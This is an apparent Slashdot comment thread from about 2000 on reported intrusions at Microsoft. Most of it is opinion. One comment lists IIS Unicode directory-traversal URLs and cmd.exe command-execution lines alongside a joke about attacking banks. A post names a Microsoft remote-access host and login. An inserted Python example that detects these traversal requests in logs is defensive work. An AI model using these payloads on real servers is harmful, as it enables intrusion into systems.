Microsoft Cracked again?
Dominic writes: "Seems Microsoft have been hacked (possibly) again, according to InfoWorld."
They don't seem to have a lot of evidence, but there's some interesting commentary related to this, and the earlier crack where the source code to Windows and Office was supposedly stolen (I'll believe that when I see it).
It seems that with these hacks Microsoft is losing more than their renowned ability to market and spin themselves around. Usually their Marketing does all the work and the technical side of their product is kept to a whisper. But now with these hacks their Admins are admitting their faults and it seems the marketing is coming back to "clarify" things so we the public don't panic.
Let me guess... A few days from now the story will be cleared up as a minor breach and that no data was modified nor seen...
Too often on here I see the ignoramus posting about the evils of Microsoft and Gates. I think it's the same thing as penis envy...he's rich, he's got an amazingly successful company..and you don't. I'm no fan of the software quality myself, but I won't go about spouting how the CEO is evil. That's just immature. I think Gates has proven himself a worthy human with all his donations. At least he's doing more than those other tech people who claim that computers can solve everything. You need to be able to eat decent food and clean water before you need a SystemTech PentiumProThlon 9000 w/ advanced graphics capabilities and altec lansing speakers. You need to solve starvation before planting a laptop in the hands of the poor.
-
> I haxored kernel.org and downloaded the linux source code
That's nothing. I downloaded it, changed some things, and uploaded the changes!
I even put my name in the files, so anyone else who downloads it will know I did it!
Sheesh, evil *and* a jerk. -- Jade
"...The[y] triage each attack and deal with those that actually form a real threat to the organisation..."
Even the most self-serving accounts of the previous crack say that the crackers were in for twelve days. M$ spun the story to say that they were watching the whole time; I don't believe that. Now *you* want us to believe that M$'s response team really focuses on attacks "...that actually form a real threat to the organization..."
Nuts. They flat didn't even know the first one was happening for 'way too long.
"...They also conduct internal tiger team attacks to ensure they know about the holes before attackers do..."
That's all real fine-and-dandy for the hard-core threats -- but every account I've read says that M$ was compromised by an email attachment that:
"Tiger teams"?
"Tiger teams" aren't going to do M$ any good; it's their own software and their own arrogance that did them in.
To let you continue:
"...Hopefully, you'll understand why most companies, including banks, are extremely reluctant to share information with the law enforcement agencies..."
No, I don't, particularly given your outlandish rationalization:
"...One simple little attack might take a company's value through the floor because investors don't understand the hoopla surrounding a security incident..."
"One simple little attack..."?
Hoopla?
That's what any shareholder concern boils down to? God forbid that a company's shares fall in price because they can't manage to implement a comprehensive security system.
And let's not worry the silly little investors about such trivia.
"Hey! They invested in our company. How smart can they be?"
t_t_b
--
I think not; therefore I ain't®
I'm on PJ's "enemies" list! Are you?
Your subject title is actually a very good answer to your question. Microsoft's security system is not entirely Windows based - if you recall an article entitled `Unix at the Empire' a few months ago, or talk to those who have knowledge of MS internal security, there is a lot of ipfilter based OpenBSD firewalls.
Though, as Microsoft are often in the habit of eating their own dog food, they might be using their new Internet Security and Acceleration [ISA] Server, the replacement to shitty old proxy server. This eliminates much of the nastiness [and non-firewallness] of PS, and is about -3 months old. This incident would damage the launch severely if MS told anyone what they were using.
I'd suspect, with regards to security, they do the testing in a closed environment for quite some time.
But your point is nevertheless a good one - while we don't know what MS use internally, the habit of people calling Outlook Viruses `email viruses', when they only affect a specific client, is misleading.
Sorry- having an open mind is great so long as your brain doesn't fall out. I think you've been spun. The guy's still the primary personality behind the totally unacceptable behavior of Microsoft, which has been _convicted_ of monopolistic crimes, the list of which is so long it'll make your head spin. Did they just do this at random? No, there was a pattern of 'search and destroy' and open attack of the capitalistic process coming right from the top there.
If tossing a few nickels at charity can really make you forget that, you have a _short_ memory.
What I do not understand is why so many people try to crack Microsoft itself. Yes, sure, you wave your manhood for everybody to admire its size, but...
... in the meantime you help actively to make the Microsoft-site the best-protected site in the world. Do you want that?
So mess with the customers of Microsoft as much as you want, embarrass them for the whole world, but leave Microsoft itself alone! There may come a time when it is desperately necessary to break into the Microsoft stronghold and *then* you want all those exploits wide open; not plugged.
I know that you don't need the source code to find buffer overflows. I also know that of 1000 people who can find a buffer overflow by examining the source code, maybe 2 or 3 know how to use SoftICE or IDA to find the same exploit by working on the binary. So basically, although you are correct in that you don't need the source code, it makes it much more difficult for the average script kiddie to find it, and thus less likely that it will become public knowledge.
Most sites are cracked by exploiting a script (perl, c, php) that resides on the server. And sometimes there is just human error, like forgetting to change a default password (*cough* slashdot *cough*)
Read this: http://www.observer.co.uk/international/story/0,6903,393015,00.html
This single article reversed 180 degrees my opinion of Mr. Gates.
I previously believed him to be a greedy, naive, power-hungry egomaniac. If this article is accurate, and he will be giving away his money for food and medicine instead of for computers (which are pretty useless if you don't have anything to eat) then maybe slashdot should look into not portraying him as such an evil person. Maybe he has finally matured?
(I know this goes completely against the conventional wisdom on Slashdot, but read the article, maybe submit it as a story here... show that even geeks can be open-minded)
Open Source, Closed Minds. We are Slashdot.
Reality has a liberal bias
From a local paper: ... network security consultant and expert on hackers, said that if a copy of the code was downloaded, the person who seized it may demand a ransom for its safe return. Or if the attacker was an "open-source vigilante," the hacker might release it on the Internet for everyone to enjoy.
"They believe information wants to be free," he said. "And that Microsoft is the big, evil empire."
A
That's funny, dammit!
The moderator who modded the above post as "Troll" must be whacked with a cluestick, please!
Quidquid latine dictum sit, altum viditur.
I only post comments when someone on the internet is wrong.
This is a hoax. The reason behind it was that Bill Gates watched "Charlie's Angel" yesterday...
Bill went home and started calling every Charlie on the phone book to hire angels.
(red herring: l0pht is incorrectly spelled "l0ft" in the article)
Shouldn't l0phtcrack be just as "illegal" regarding Microsoft SAM encrypted password files as DeCSS is to DVDs?
Speak truth to power.
"It's hard to give you an absolute certainty that the patch had been applied across the board. Given today's incident, our security teams are going back to check out the systems."
This statement is particularly disheartening. When the problems with Microsoft Outlook Express and the "features" that allow viruses to spread have their only fix with these Patches, and that -- according to even Microsoft -- it's hard to make sure that the patches are applied completely: we should worry.
One might say that the little Microsoft Accessories should have been coded correctly the first time (before being published) but that is often a very hard thing to do.
I am asking You All: What ways could we make sure that "patches" had been applied across the board?
We know that no web server is immune to being cracked. Not because it's a Microsoft web server that it should be immune. They're using the same software as the other big web sites that have been cracked.
Think like a man of action, act like a man of thought.
Color me paranoid but I think Microsoft is up to no good....Hacked twice in a couple of weeks?
AdFuel
________
OT and all but don't use wu-ftpd, if they have problems(not really an if) use ProFTPd or something else.
--
And now they will release "Windows RT 2000 Secure Edition"
RT - Russian Technology
--
1% APY, No fees, Online Bank https://captl1.co/2uIErYq Don't let your $$$ sit in a no-interest acct.
I was given a copy of a small log that Dimitri shared with the IDG reporter. Egg.microsoft.com was not one of the servers mentioned.
And yes, the exploit was nearly identical to one of the lines you mentioned above.
(The IDG reporter said I couldn't share the log, sorry. Though it's possible that restriction might be gone now that the story has been published. The Infoworld story is a reprint of the IDG story that broke on Friday. Strangely enough, I didn't actually say the first sentence attributed to me in the article.)
I've seen this so called hacker on a Dutch television show and he's more than pathetic. When security and such were a bit more popular he got invited to a television show in which he would show how easy it was to hack a website. The site being targeted was www.voetbal.nl. Like I said it was more than pathetic; he claimed that he hacked it (during a commercial break) and when he wanted to show it it wasn't able to anymore. "They changed the password", he said. Yeah right; at 22:00 on a Sunday someone is still working and immediately changed the password in, say, 5 min. No, this is just your regular hacker wannabe who will try anything to "ride a wave" in order to get his name mentioned. Remember; "it doesn't matter how you talk about them as long as you are talking about them".
If the exploit is sufficiently high priority (and -- not to dig at Microsoft -- most Microsoft patches are high priority because of the length of time they take to release them and the likelihood that a real-world exploit already exists for them) there is only one way to be sure. Shut down access to everything that doesn't have it yet, and only bring it back online when it does.
--
It's rare that you're presented with a knob whose only two positions are Make History and Flee Your Glorious Destiny.
Unfortunately, pursuant to subparagraph J of section 3, chapter 13 of the Microsoft end-user license agreement (EULA), Microsoft reserves the right to terminate any user who comes in contact with the Windows source code.
If you do receive the code via email or any other means, you are required to unplug your computer, telephone, and television, close your eyes, cover your ears, and chant "la la la, I can't hear you". Failure to comply with these provisions that protect our intellectual property is a violation of the DMCA, and will result in the MS Death-Commando(tm) being dispatched to your location.
We reserve the right to take legal action against anyone who has seen the aforementioned code, anyone who assisted in the theft of the code, anyone who made funny remarks about our IP protection measures, and anyone who found said illegal statements humorous. Stop laughing, we mean it
0 1 - just my two bits
As long as humans are designing software, it's going to reach a complexity where not all use-cases can be considered. Therefore, there is the highest chance that some flaw will creep in. And then, since the number of people trying to discover that flaw in order to abuse it is always going to exceed the number of people looking for flaws to fix, the situation will continue. We've had say, 20 years of cracking - no reason to assume it's going to stop now.
--Remove SPAM from my address to mail me
I realize that this is somewhat inflammatory, but I feel like it should be asked. I am not a programmer, and have the utmost respect for anyone who is capable of writing something like wine, but: Is that really a loss to the Free Software community? Is there any real use for wine except to run proprietary software under Linux? Does this not further our addiction to proprietary software (most notably that heinosity known as "Office") by reducing the imperative to create Free alternatives? Does this not endanger Free alternatives by extending the marketshare of proprietary applications (in that, Office users can now legitimately carp to Linux users that all work should be done in Office since it runs on wine)?
I do not have a signature
I am being serious here, but at the same time, I know that I am being paranoid.
Microsoft has ties with several people in the government. Good ties. Friendships, so to speak. All of these recent hacker attempts seem a little fishy to me. Why all of the publicity, all of a sudden? Why the big stink?
The USA government wants to pass even more restrictive internet and computer laws... laws which will be passed in the name of security, yet at the same time, killing our necessary personal freedoms - our rights.
Bush and Bill are buddy buddy. Microsoft will hold out on seeing the Supreme Court until Bush has become prez and has appointed new Justices. Microsoft will get a slap on the wrist. Our government will then apply god awful amounts of regulation to the computer industry...
So, yes I am being paranoid, but it all seems so obvious to me. Let's just hope that I am wrong, and next year, I am NOT saying "I told you so."
Is that supposed to be sarcastic?
Try reading my .sig ya clam
Muslim community leaders warn of backlash from tomorrow morning's terrorist attack.
When they were "cracked" last week, the stock rose a few bucks. Of course they got cracked again!
What is a very good way for M$ to stop wine, or at least discourage people from working on it? Create a situation where they can feasibly claim that code in it just might be stolen or that the people who wrote it had access to Windows source code. Whether they did or not is irrelevant, the fact that you can cause legal problems for them simply based on the idea that they might have is what matters. If I were a ruthless organization bent on world domination (like microsoft or $cientology), this is exactly what I would do.
Expect to see legal roadblocks in the future for wine.
Lee
Muslim community leaders warn of backlash from tomorrow morning's terrorist attack.
As I understand it, UCITA allows software companies to remotely disable software (almost) at will. If companies go for this (well they got the law passed for a reason), this could mean that hacking into a company such as M$ would give access to the programs / codes / whatever to shut down any of that company's software on any customer's site (assuming they're connected to the net).
Now that would be scary.
I bet the politicians behind UCITA didn't think of that.
Notice how no news agency that has reported the recent cracks has equated the security flaws in Microsoft's network and servers to Microsoft's Windows operating system. No news agency is suggesting that "if you use windows, you could be next", as they often do with other reports. "Man dead after drinking poisoned orange juice... Find out if your orange juice could be poisoned - tonight at 10." Why is it that the news media is not running their usual tricks to scare the populace. In my (not ever humble) opinion, everyone running Windows is running the risk of their network/servers being cracked.
-------
Oh shit! I forgot to click "Post Anonymously"...
Microsoft's internal network is made up of many separate domains (and Active Directory forests). The Houston domain is used exclusively for Microsoft's online properties (MSN.com, Microsoft.com, etc...) and has no privileges to Microsoft's primary domain, REDMOND.
BTW: You can PPTP into Microsoft at cxn-redmond.microsoft.com. (However, they took it down recently because of these security problems.) Username: REDMOND\billg; Password: ????
President Clinton could not be reached for comment, but Governor and Presidential candidate George W. Bush said "that's the way the cookie jar crumbles." No, we don't know what he was talking about either.
Jeff
He doesn't want to believe he threw his money away on garbage.
MS has no incentive in the marketplace to improve their software. Maybe bringing it home to them, by showing them how bad their security is, will force them to make a better product. I doubt it though.
I worked in a bike shop for a few years. One man kept bringing in his bike to repair flats. He had about ten patches on his tires. It would have been cheaper to buy a heavy-duty inner tube and thorn scrapers, than to have it repaired over and over again, but he kept that leaky old inner tube.
Free software is limited by one important issue, who is going to do the coding and who is going to use the product coded? The vast majority of free software is created by people because they use it themselves. But there are also other areas where the people who have the talent to write the code have no interest in using the end product. Here proprietary solutions will continue to dominate.
I don't know about you, but I really don't care whether my word processor is freeware or commercial. I want the underlying operating system to be free, or at least have all its specs published in full. Linux is great not so much because it is free of charge, but because there aren't any secrets about it. With windows there are lots of secrets. With the MacOS there are even more. But with Linux everything is right there on the table and it's got a complete development environment included to boot! Talk about a hacker's (!cracker) dream come true!
In short, the open source/free software model is one that works in some areas. It does not work for all. Therefore it is not going to take over the world. Twenty years from now commercial software will be just as prevalent as it is right now, if not more prevalent. There is every chance that free software might not be successful in the long run. There is also every chance that it will be successful. But there is nearly zero chance that it will overtake every other development model.
I personally think wine is the greatest thing since Linux itself. Imagine a terminal server type system based off wine? M$'s own terminal server is severely limited by the poor multi-user performance of NT. Unlike Linux and virtually any other version of Unix, it is very easy for a single user to eat up all the resources and lock out everyone else. This is a serious problem, but one that wine does not share. It wouldn't be too hard to make wine into one kick ass terminal server/citrix metaframe style system.
I'm looking forward to bigger and better things from wine.
Lee
Muslim community leaders warn of backlash from tomorrow morning's terrorist attack.
They did not actually switch to Solaris - they use NT for the front-end servers off an Oracle back-end database running a Sun Solaris server.
The reason is that they find it easier to do rapid application development on the Windows machines. So in theory they can keep their back-end solid via Unix while having the development tools on an easily mastered platform.
Personally, I think running the whole thing on Solaris would have been easier, but that is/was their rationale.
D
----
MS server software is, out of the box, full of security holes and downright dangerous to put on the Net without extensively patching them first, and
In the past, I had to keep up on patching default Mandrake Linux 7.0 installs just to make sure that I didn't get owned by a wu-ftpd site-exec kiddie. Installing any OS requires keeping on top of things when you admin a server(s)... Micro$~1 makes sure that you have more to do to keep your servers "secure"
First thing I do after installing any OS is find any security info I can and apply the related fixes.
One future, two choices. Oppose them or let them destroy us.
The real impact here is what this does to MS as a service vendor. At a time when system software is quickly joining hardware in the "commodity" category, services are becoming ever more important to companies as a revenue source. If MS can't even secure their own servers, how can they possibly claim to be able to do so for clients?
I am willing to bet this "hacker" owned egg.microsoft.com, which was not patched. It took them a few days to take it down and it still is offline.
/ cmd.exe?/c+dir
/ cmd.exe?/c+dir
/ cmd.exe?/c+dir
/ cmd.exe?/c+dir
/ cmd.exe?/c+dir
/ cmd.exe?/c+dir
/ cmd.exe?/c+dir
He was not a "hacker" he just created one of the unicode urls that got parsed incorrectly by IIS. No skill.
http://target/scripts/..%c1%1c../winnt/system32
http://target/scripts/..%c0%9v../winnt/system32
http://target/scripts/..%c0%af../winnt/system32
http://target/scripts/..%c0%qf../winnt/system32
http://target/scripts/..%c1%8s../winnt/system32
http://target/scripts/..%c1%9c../winnt/system32
http://target/scripts/..%c1%pc../winnt/system32
Ok, now kids, don't go owning any banks running IIS today (Most are not patched)!
Ever need an online dictionary?
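Added example, not part of any comment in the thread: a log check for the malformed and overlong UTF-8 escapes seen in the `/scripts/` requests quoted above, showing why a traversal check has to run after decoding. The log layout, IP addresses and status codes are constructed; the function names are hypothetical.

```python
import re

HEX = set("0123456789abcdefABCDEF")

# Constructed sample log (simplified fields: date time c-ip method uri status).
# The /scripts/ paths are the ones quoted in the thread; IPs are documentation ranges.
SAMPLE_LOG = """\
2000-11-06 10:01:02 192.0.2.10 GET /index.html 200
2000-11-06 10:01:07 192.0.2.10 GET /docs/caf%c3%a9.html 200
2000-11-06 10:02:11 198.51.100.7 GET /scripts/..%c0%af../winnt/system32 404
2000-11-06 10:02:12 198.51.100.7 GET /scripts/..%c1%9c../winnt/system32 404
2000-11-06 10:02:13 198.51.100.7 GET /scripts/..%c0%qf../winnt/system32 404
2000-11-06 10:02:14 198.51.100.7 GET /scripts/..%c1%1c../winnt/system32 404
""".splitlines()


def percent_decode_strict(uri):
    """Decode %xx escapes to raw bytes; collect escapes that are not valid hex."""
    out, bad, i = bytearray(), [], 0
    while i < len(uri):
        pair = uri[i + 1:i + 3]
        if uri[i] == "%" and len(pair) == 2 and set(pair) <= HEX:
            out.append(int(pair, 16))
            i += 3
            continue
        if uri[i] == "%":
            bad.append("%" + pair)
        out += uri[i].encode("utf-8")
        i += 1
    return bytes(out), bad


def inspect_uri(uri):
    """Return (findings, canonical) for one request URI."""
    raw, bad = percent_decode_strict(uri)
    findings = [("malformed-escape", esc) for esc in bad]
    canonical, i = [], 0
    while i < len(raw):
        b = raw[i]
        nxt = raw[i + 1] if i + 1 < len(raw) else 0
        if b in (0xC0, 0xC1) and 0x80 <= nxt <= 0xBF:
            # Two-byte form of a code point below U+0080: overlong, never legal UTF-8.
            hidden = chr(((b & 0x1F) << 6) | (nxt & 0x3F))
            findings.append(("overlong-utf8", hidden))
            canonical.append(hidden)
            i += 2
        elif b in (0xC0, 0xC1):
            findings.append(("bad-lead-byte", "%02x" % b))
            canonical.append("\ufffd")
            i += 1
        else:
            canonical.append(chr(b))  # other bytes kept 1:1 for the segment check
            i += 1
    canonical = "".join(canonical)
    if not findings:
        try:
            raw.decode("utf-8")  # strict decode catches remaining invalid sequences
        except UnicodeDecodeError:
            findings.append(("invalid-utf8", ""))
    # Traversal check runs on the canonical form, with both separators.
    if ".." in re.split(r"[/\\]", canonical):
        findings.append(("traversal-after-decode", canonical))
    return findings, canonical


def scan_log(lines):
    """Return {line_number: [finding kinds]} for lines whose URI has findings."""
    hits = {}
    for n, line in enumerate(lines, 1):
        fields = line.split()
        if len(fields) < 6:
            continue
        findings, _ = inspect_uri(fields[4])
        if findings:
            hits[n] = [kind for kind, _ in findings]
    return hits


if __name__ == "__main__":
    for n, kinds in scan_log(SAMPLE_LOG).items():
        print(n, SAMPLE_LOG[n - 1].split()[2], kinds)
```

A segment check on the undecoded URI sees `..%c0%af..` as one ordinary path component, which is why the check is applied to the canonical form.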
Steve Mann who is a prof at UofT (Toronto) teaches hardware engineering and wearable computers noted that any MS Windows is a toy operating system. The guy only deals with Unix though.
You can't handle the truth.
That's not quite true, though. One additional, and very important, thing that you can do is to try to figure out how to minimize the damage that an attacker can do even if he does manage to crack something. This is an area in which Unix/Linux and NT both fall down pretty badly; they spend a lot of time trying to make it hard to get privilege, but let you do pretty much anything you want if you do. There needs to be a lot more attention paid to making systems damage tolerant, so that a broken ftpd (or whatever) won't put the whole system at risk.
There's no point in questioning authority if you aren't going to listen to the answers.
I tried this exploit against one of MY OWN MACHINES. As in, a machine that is owned by me, on which I already know the Admin password etc.
The first thing I tried was the cmd.exe /c dir command like x-empt suggested and the result was the expected.
Then I pcanywhered in and decided to see if I remote launched notepad if it would appear on the display. When notepad.exe was launched, the whole system crumbled. I tried to kill it, but it won't die. Task Manager just says "Access Denied". Geez, where's kill -9 when you need it. I'm even logged in as admin. I can't kill the process, and I can't start anything except task manager. Can't even launch the services panel to kill IIS.
So now I'm attempting the tried and true method of fixing a win box.
...is at risk of being cracked.
Connect your computer to the internet. Allow it to accept any connection of any sort, ever, from anyone.
Congratulations. You're now at risk of being cracked.
All you can do now is neurotically, obsessively, try to think of every situation in which this cracking could happen, and try and cover it. Then ask all your friends, enemies, and family pets to tell you what you missed.
You're still going to get cracked one day, if enough people try, and enough people care. System administration is more about making this cracking difficult to the point of it not being worth it, rather than ruling it out altogether.
--Remove SPAM from my address to mail me
You are assuming script-kiddies need the source code to find out vulnerabilities in software, but the truth is, if they were able to understand the design intricacies of software they would not be script-kiddies.
Believe me, for those of us who are competent enough to choose between building or destroying, it's much more rewarding to be creative.
We all know that most people here on ./ enjoy a good M$ bashing when they get the chance. Sometimes the subjects are a bit questionable and not really good material for it. But if the article is correct, then they have really asked for it this time. :-) :-)
Now for mine. A company that size with so many users depending on them, has a huge responsibility in keeping this from not happening. When it happened the first time, they should have the resources to make sure that it doesn't happen again. Don't tell me they can't divert the manpower needed to solve this. Let's see the list of posts grow as usual, can we go past 500.
[extreme bashing on]If they can't secure their own network based on their own products who can.[extreme bashing off]. ah felt good.
But somehow I doubt that it will affect anyone's decision about running their software. No impact at boss level, I'm afraid.
--------
I haxored kernel.org and downloaded the linux source code
1) MS server software is, out of the box, full of security holes and downright dangerous to put on the Net without extensively patching them first, and
2) Patching them won't even help you, because there are too many patches and too many holes. So many, in fact, that even MS can't keep up with them, even though the patches are developed and tested in the same building.
Did I miss anything?
> Call it embarrassment, call it publicity, but please don't call it unadulterated altruism.
Err, I don't think that my words implied that Billg was an example of ``unadulterated altruism". If being a limousine liberal was identical to pure unadulterated altruism, then we'd be giving Sally Struthers, spokeswoman for the ``Save the Children" foundation the Nobel Peace Prize, rather than Mother Teresa.
Then again, even if ``a lot of the donating that he does comes with the proviso that his name is loudly involved", I'll admit for sake of fairness that it's more than some of his peers are doing. Will we ever see the ``Larry Ellison Home for Battered Women"? Or even an ``Andrew Grove Foundation for Judaic Studies"?
So far, all I've seen created is Paul Allen's temple to Jimi Hendrix, & I'm still not convinced that even that is a good thing.
Geoff
I think I see a trend here. Maybe for them it really would be easier to muzzle the entire internet than to produce p